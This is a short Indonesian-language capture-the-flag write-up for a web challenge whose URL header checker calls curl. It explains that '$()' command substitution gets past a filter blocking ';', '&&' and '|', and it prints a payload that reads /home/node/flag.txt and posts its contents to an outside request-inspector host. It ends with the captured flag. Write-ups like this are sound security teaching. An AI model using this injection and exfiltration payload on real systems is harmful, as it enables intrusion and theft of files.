Pada soal, diberikan sebuah url web

http://103.200.7.156:7080/

Saat kita buka url tsb, ternyata kita dapat mengecek header dari suatu url, misal google

Pastinya Remote Code Execution, karena biasanya soal tipe seperti ini menggunakan curl. Sayangnya filter lumayan kerad, (; && | ternyata dibanned :”).

Oke, untungnya $() tidak dibanned.

Kita akan membypassnya menggunakan command curl yang dibungkus dengan $() dan mengoper responsenya  ke HTTP Request Inspector

http://reqbin.cacadosman.web.id/v0b9bnv0?inspect

Kita eksekusi dengan memasukkan payload berikut

$(curl --data "flag=$(cat /home/node/flag.txt)" http://reqbin.cacadosman.web.id/v0b9bnv0)

BIMSALABIM AVADA KADAVRA

SlashRootCTF{b3c0me_a_cvvvrL_n1nj4!}